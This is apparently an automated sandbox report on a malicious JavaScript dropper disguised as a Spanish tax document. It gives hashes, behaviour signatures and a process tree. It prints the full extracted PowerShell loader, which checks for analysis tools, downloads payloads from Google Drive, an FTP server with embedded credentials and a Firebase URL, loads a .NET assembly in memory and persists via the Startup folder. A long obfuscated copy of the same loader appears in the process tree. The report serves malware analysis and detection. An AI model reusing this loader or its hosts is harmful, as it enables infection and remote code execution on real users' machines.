Overview

overview

10

Static

static

1

06122024_1...023.js

windows7-x64

06122024_1...023.js

windows10-2004-x64

10

Analysis

  • max time kernel
    217s
  • max time network
    221s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    06-12-2024 15:51

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js

  • Size

    195KB

  • MD5

    6675b77a4e527883e0cd36a107269299

  • SHA1

    48b54aab7672ff52328632c110c7b14207f91832

  • SHA256

    cb8afa9d1cab7e87066a992f5954e223720e39064d6d9f425a5e85a13e6a9b3a

  • SHA512

    b4182d413aa3b8133c72a61a3b2136f6a61a4ce0a6f054d40329a00c897140003046ec34fce3dea5de6c88a491b3a920744cb48fb69b6c4f0c70f5bbc6f79046

  • SSDEEP

    3072:lW1tKbWXt+NWXt+NWXt+NWXt+NWXt+NWXt+CWXt+NWXt+NWXt+NWXt+NWXt+NWXC:G

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Source
1
$cIOeC = $host.Version.Major.Equals(2);If ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$qvjjf = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $Xumfi ) {$qvjjf = ($qvjjf + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$qvjjf = ($qvjjf + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$xxwtl = ( New-Object Net.WebClient ) ;$xxwtl.Encoding = [System.Text.Encoding]::UTF8 ;$xxwtl.DownloadFile($qvjjf, ($HzOMj + '\Upwin.msu') ) ;$UwfwZ = ( 'C:\Users\' + [Environment]::UserName );JCCGX = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){
2
3
}
4
5
else{
6
Restart-Computer -force ;
7
exit ;
8
} ;$qbsqs = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $qbsqs ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''e2622eb94959-848b-e5c4-04dc-e72e429d=nekot&aidem=tla?txt.loguh/o/moc.topsppa.8e7e8-soiranollom/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js'' , ''D DDInstallUtil'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops startup file 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2336
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nKvfY = 'JA' + [char]66 + 'jAEkATw' + [char]66 + 'lAEMAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAYw' + [char]66 + 'JAE8AZQ' + [char]66 + 'DACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'xAHYAag' + [char]66 + 'qAGYAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAWA' + [char]66 + '1AG0AZg' + [char]66 + 'pACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAWA' + [char]66 + '1AG0AZg' + [char]66 + 'pACAAKQAgAHsAJA' + [char]66 + 'xAHYAag' + [char]66 + 'qAGYAIAA9ACAAKAAkAHEAdg' + [char]66 + 'qAGoAZgAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAHEAdg' + [char]66 + 'qAGoAZgAgAD0AIAAoACQAcQ' + [char]66 + '2AGoAag' + [char]66 + 'mACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + '4AHgAdw' + [char]66 + '0AGwAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + '4AHgAdw' + [char]66 + '0AGwALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + '4AHgAdw' + [char]66 + '0AGwALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAcQ' + [char]66 + '2AGoAag' + [char]66 + 'mACwAIAAoACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACkAIAApACAAOwAkAFUAdw' + [char]66 + 'mAHcAWgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'KAEMAQw' + [char]66 + 'HAFgAIAA9ACAAKAAgACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'KAEMAQw' + [char]66 + 'HAFgAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAVQ' + [char]66 + '3AGYAdw' + [char]66 + 'aACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAcQ' + [char]66 + 'iAHMAcQ' + [char]66 + 'zACAAPQAgACgAJw' + [char]66 + 'mAHQAcAA6AC8ALw' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0ADEAQA' + [char]66 + 'mAHQAcAAuAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQALg' + [char]66 + 'jAG8AbQAuAGIAcgAvAFUAcA' + [char]66 + 'jAHIAeQ' + [char]66 + 'wAHQAZQ' + [char]66 + 'yACcAIAArACAAJwAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAIAApADsAJA' + [char]66 + 'KAHUAaw' + [char]66 + 'wAFYAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAEwAUQ' + [char]66 + 'RAEEAQgAgAD0AIAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAgADsAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAIAA9ACAAKAAtAGoAbw' + [char]66 + 'pAG4AIA' + [char]66 + 'bAGMAaA' + [char]66 + 'hAHIAWw' + [char]66 + 'dAF0AKAAxADAAMgAsACAAOAA5ACwAIAAxADEANwAsACAAMQAwADAALAAgADgAOQAsACAANAA5ACwAIAA1ADMALAAgADUANQAsACAANQA2ACwAIAA2ADQALAAgADYANAAsACAANgA0ACwAIAA2ADQALAAgADYANAAsACAANgA0ACAAKQApACAAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAkAEwAUQ' + [char]66 + 'RAEEAQgAsACAAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAKQAgADsAJA' + [char]66 + 'SAFYAVQ' + [char]66 + 'YAHYAIAA9ACAAJA' + [char]66 + '3AGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'xAGIAcw' + [char]66 + 'xAHMAIAApACAAOwAkAFIAVg' + [char]66 + 'VAFgAdgAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQASg' + [char]66 + '1AGsAcA' + [char]66 + 'WACAALQ' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAAnAFUAVA' + [char]66 + 'GADgAJwAgAC0AZg' + [char]66 + 'vAHIAYw' + [char]66 + 'lACAAOwAkAFMAVA' + [char]66 + 'mAEcAbAAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMgAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4AIAA9ACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'XAGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4ALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAAgAD0AIAAoACAARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'KAHUAaw' + [char]66 + 'wAFYAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAD0AIAAkAFAAaA' + [char]66 + 'yAGwATgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQAYQ' + [char]66 + 'lAEQAdw' + [char]66 + 'VACAAPQAgACcAJA' + [char]66 + 'yAHkAYQ' + [char]66 + 'lAEcAIAA9ACAAKA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAnACAAKwAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAAKwAgACcAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQAYQ' + [char]66 + 'lAEQAdw' + [char]66 + 'VACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEYAeQ' + [char]66 + 'mAGQAegAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAGEAZQ' + [char]66 + 'EAHcAVQAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgAnACAAKwAgACcAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'GAHkAZg' + [char]66 + 'kAHoAIAApAC4AJwAgADsAJA' + [char]66 + 'hAGUARA' + [char]66 + '3AFUAIAArAD0AIAAnAEcAZQ' + [char]66 + '0AFQAeQ' + [char]66 + 'wAGUAKAAgACcAJw' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMATA' + [char]66 + 'pAGIAcg' + [char]66 + 'hAHIAeQAzAC4AQw' + [char]66 + 'sAGEAcw' + [char]66 + 'zADEAJwAnACAAKQAuAEcAZQ' + [char]66 + '0AE0AJwAgADsAJA' + [char]66 + 'hAGUARA' + [char]66 + '3AFUAIAArAD0AIAAnAGUAdA' + [char]66 + 'oAG8AZAAoACAAJwAnAHAAcg' + [char]66 + 'GAFYASQAnACcAIAApAC4ASQ' + [char]66 + 'uAHYAbw' + [char]66 + 'rAGUAKAAgACQAbg' + [char]66 + '1AGwAbAAgACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcAJw' + [char]66 + 'lADIANgAyADIAZQ' + [char]66 + 'iADkANAA5ADUAOQAtADgANAA4AGIALQ' + [char]66 + 'lADUAYwA0AC0AMAA0AGQAYwAtAGUANwAyAGUANAAyADkAZAA9AG4AZQ' + [char]66 + 'rAG8AdAAmAGEAaQ' + [char]66 + 'kAGUAbQA9AHQAbA' + [char]66 + 'hAD8AdA' + [char]66 + '4AHQALg' + [char]66 + 'sAG8AZw' + [char]66 + '1AGgALw' + [char]66 + 'vAC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AG8AcA' + [char]66 + 'zAHAAcA' + [char]66 + 'hAC4AOA' + [char]66 + 'lADcAZQA4AC0Acw' + [char]66 + 'vAGkAcg' + [char]66 + 'hAG4Abw' + [char]66 + 'sAGwAbw' + [char]66 + 'tAC8AYgAvADAAdgAvAG0Abw' + [char]66 + 'jAC4Acw' + [char]66 + 'pAHAAYQ' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAZw' + [char]66 + 'hAHIAbw' + [char]66 + '0AHMAZQ' + [char]66 + 'zAGEAYg' + [char]66 + 'lAHIAaQ' + [char]66 + 'mAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACcAIAAsACAAJwAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAnACAALAAgACAAJwAnAEQAIA' + [char]66 + 'EAEQASQ' + [char]66 + 'uAHMAdA' + [char]66 + 'hAGwAbA' + [char]66 + 'VAHQAaQ' + [char]66 + 'sACcAJwAgACAAKQAgACkAOwAnADsAJA' + [char]66 + 'WAEIAVw' + [char]66 + 'XAHoAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADMALg' + [char]66 + 'wAHMAMQAnACkAIAA7ACQAYQ' + [char]66 + 'lAEQAdw' + [char]66 + 'VACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'WAEIAVw' + [char]66 + 'XAHoAIAAgAC0AZg' + [char]66 + 'vAHIAYw' + [char]66 + 'lACAAOw' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sACAALQ' + [char]66 + 'FAHgAZQ' + [char]66 + 'jAHUAdA' + [char]66 + 'pAG8Abg' + [char]66 + 'QAG8AbA' + [char]66 + 'pAGMAeQAgAEIAeQ' + [char]66 + 'wAGEAcw' + [char]66 + 'zACAALQ' + [char]66 + 'GAGkAbA' + [char]66 + 'lACAAJA' + [char]66 + 'WAEIAVw' + [char]66 + 'XAHoAIAA7AH0AOwA=';$nKvfY = $nKvfY.replace('革','B') 